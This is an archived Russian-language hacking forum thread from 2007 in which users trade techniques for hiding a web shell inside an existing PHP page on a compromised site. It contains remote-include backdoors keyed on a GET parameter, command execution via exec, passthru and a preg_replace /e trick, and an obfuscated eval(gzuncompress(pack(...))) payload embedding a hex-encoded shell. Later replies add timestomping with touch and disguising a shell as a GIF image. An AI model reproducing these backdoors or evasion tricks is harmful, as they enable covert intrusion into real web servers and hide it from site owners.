PDA

Просмотр полной версии : Как спрятать шелл внутри страницы?

FaR-G9
05.08.2007, 18:29
Еще один вопрос
как можно спрятать полноценный шелл внутри страницы?
Т.е. если заходишь faq.php - была страница faq,
а если faq.php?shell - открывался шелл
Нужен именно полноценный, а не такой типа system($_GET["cmd"]);
и без инклуда
ENFIX
05.08.2007, 18:35
сделай удаленный инклуд

if(isset($_GET['shell'])) include ($_GET['shell']);
FaR-G9
05.08.2007, 18:44
там функция инклуд снесена ((
ENFIX
05.08.2007, 18:47
какие там функции отключены?
FaR-G9
05.08.2007, 18:51
mb_send_mail,error_log,symlink,include,system
ENFIX
05.08.2007, 18:58
if(isset($_GET['shell'])) require($_GET['shell']);

пример:

site.com/faq.php?shell=http://site.domen/shell.txt
FaR-G9
05.08.2007, 19:14
Что-то инклудится не хочет. Показывает пустой экран
Тогда другой вопрос, какими еще функциями(кроме system) можно выполнять команды
например wget и ls -la
И еще, можно-ли изменить дату редактирования файла без system() ?
ENFIX
05.08.2007, 19:22
exec(), passthru()
NuR
05.08.2007, 19:31
попробуй так:
preg_replace("#blah#e", $_GET['cmd'], "blah");
обращаться как 123.php?c=passthru(dir)
параметры интерпритируються как пхп код
FaR-G9
05.08.2007, 19:31
Огромное Спасибо ENFIX
Я догадался, как засунуть код шелла на станицу

if(isset($_GET['shell'])) eval(gzuncompress(pack("H*",'789ced7d6b731b4792e06733c2ffa1d483710316000220f8 26684a244551a2449aa4244ba216d1e86e022d0268b81be043 b6fedbdec646ecc65eecedcedcfd005a23ae693d284ada19df 861de3cbac47775577032465cfcccec5302c03a8ca57656565 bdb36ccf73bdaa67775cafebb4ebe94266fae321dfee565b46 dd31ab5ff6dcaeed57bd5ebbebb46c963b87d9f8b3da745a4e 97273a6da70a1969bd65ec57ed7ddbec751db74de1f46c04c4 ed753bbd6eb5d6dbdeb63de0ca0152beb16d575bae65930aa1 d075840e52750ab46b7b3e500610bd981f29ea90e66ca7796a d5745b1dc3b3d39d468727a53359a297f3c57c41cf904a85e4 8a998f87c857f02f555d5bddd82404487d92babeb9b9467f57 ef5e59df98a6d94b8b981b66c36f29776371fdeee27a98cb7e 4b00f3abab3797174300f63b00788a8293f45c3daaed7ac74c 678490dbae671b6683a4b9b4864f523b95d9d42e0250085e8e 87a99d47c0cbef7a4ec76f1a7ec3f6d300859c90954c880b96 488ae50d244698f054ef29a3d76da05a8b19a48005bae4f858 cb42410ff5b5eb6bd52b7736af57ef408afe2843befe9ab4ac d10110972a9554db68d90320d7ee71b88ee1fbb400ac04a461 1b96eda5f57bf7eee5ae80703698ae6974ed2972d5f01d9380 169aad8ae68d8e43a99a4d4d67a50af0b0aa86c15a48b95024 77da583ed7739ed89600b4f7c1e8b599daec8c411a9ebd5d69 74bb9da9e161cfefe6775dc7ca7bbd59417d66d8982553e48a 69dabe4f16ecb6635b33c3b5598dd302353e850f306b648f36 3d73299723fff4fcf4f0d9db77cfde7f9725ff70f8f62792cb cd7e3c34d3e8b69af41360f1b3eb749bb6c48bfd868c96dd05 d940ac9cfd65cfd9ad68f36ebb0b8ac86d1e746c8d98ec5745 ebdafbdd61a43a4dcc86e141b555f69cb6e5eef9b96269b4a8 cd622dcf6c6cde5f5984af5d0f557c75757d61713db7bebc74 7d738a905f19f48f143bfbc4779b8e351d806caeae4d61fbf9 954dff92405616af2191412057573737576f4d253232dda6eb 415681fe4102e8b36bfd354899ef1ab5a65d0c459d2285ce3e d2bb327f73697df5ceed85dcfceaca2aa4ff6aa1bc50989fe8 4bc84aa0b20d353c45c63b5d72d7f62ca36df4c5f612b013d5 8af2caa08a36c0a383f17c80f84e1b7a82a40adba67f032b6c 92fe0dacb0fe20418525318a17c22edb056b22d0ecc4999af5 eda66dfeff56325eb45e0dfa7dc5166abd6ed76d379c7aa309 ffbaa474864d044cf71cabdb982223855ff7b33b7051d0a11b 7f7d9abce6ecdb967fe0939adbece706aeae2edcc792b50caf eeb4a790431264cd3077ea9edb6b5b39911730032a57a69a4e 7b877cc504f16c6b9a6c2e7eb1995b589c5f5dbfb2b9bc7a7b 8ab4ddb64d41771ddfe9dae024c9b9c00db3ebecdae7a4dd70 61d045be6232d69a3d7bba1fecccb0e855667c1306195dd234 daf59e51b72b5bfa6363d760a95b3a406cf7da260e2649c3b1 ecaae5eca61d0b7a7cdadd5baed96b415f968751d462d3c6af 570f962d84c8fbdd83a69db71cbfd3340ea06fddd291f9963e ad209aaebbe3d815c7babca5570ad334fba9c4d46fb87b3f8b 69ade99a3b03b916e35ca13b6ed76961fdaec419c75717e01e 96998d9094c25081eca66fb32c59b94c9899615609b3faf490 0983409f3c713adb4ed3e6c210b26b782465195dc3b74d42d8 58d9f03ce320cdc7370cc2ec7a4d20edf587b0dded6a005521 dad6fe68616bbf5cdbda2f8cc2bf31f85790ff69323234afaa bbbd0dce86922ff0bc4097bdb6b35f5a70fd4d9cc2a4f017ce 4a1032c3c78cf42f85a95436c892e128e06704d40d45b5d319 18d089ef0194280dfe612585c41eea07f0457f446648717242 65a9b20d2069311078ba3f68cb6d3348041d0467190701c901 700db7e7f91430d460223da7dd83498afee80c38b008b76dc5 e1e8ec81ff7976b7e7b5493a495b39aead9919521a852983aa 52567acc2bc6f3588921b3380699aa88f8974e2a378227d00a 4a0bf97131c242cecec20c88175314313040c3b2ae41b349d3 a69225746a9365daa256c8c06553a4931f56693007c3f979d3 30edb4beb5a5c36c7658e74464ab4b59941ec5b16cb361ef83 a80dc7cfcdaaf64fad554104508bcba26fedeb24cf693d1c7b 147e1f7f145724816c15a32c618c9e0ba324618c9c0ba32061 141f4905b1778d665a978ba351b

Работает!!!
Только остался один вопрос
Можно ли изменить дату изменения файлов?
_Master-
05.08.2007, 21:00
да, можно, например
touch 01221240 /etc/passwd
будет 22 января 12:40
heks
27.10.2007, 09:36
и все изобретают велосипед поновой пользуйся поиском
http://forum.antichat.ru/showthread.php?t=30873
blackybr
27.10.2007, 11:08
Берешь шел. переименовываешь в blabla.gif,, кидаешь в папку с картинками..
ну и дальше к примеру

if ($_get['faq']=="show") @require('./относительный_путь_к картинке');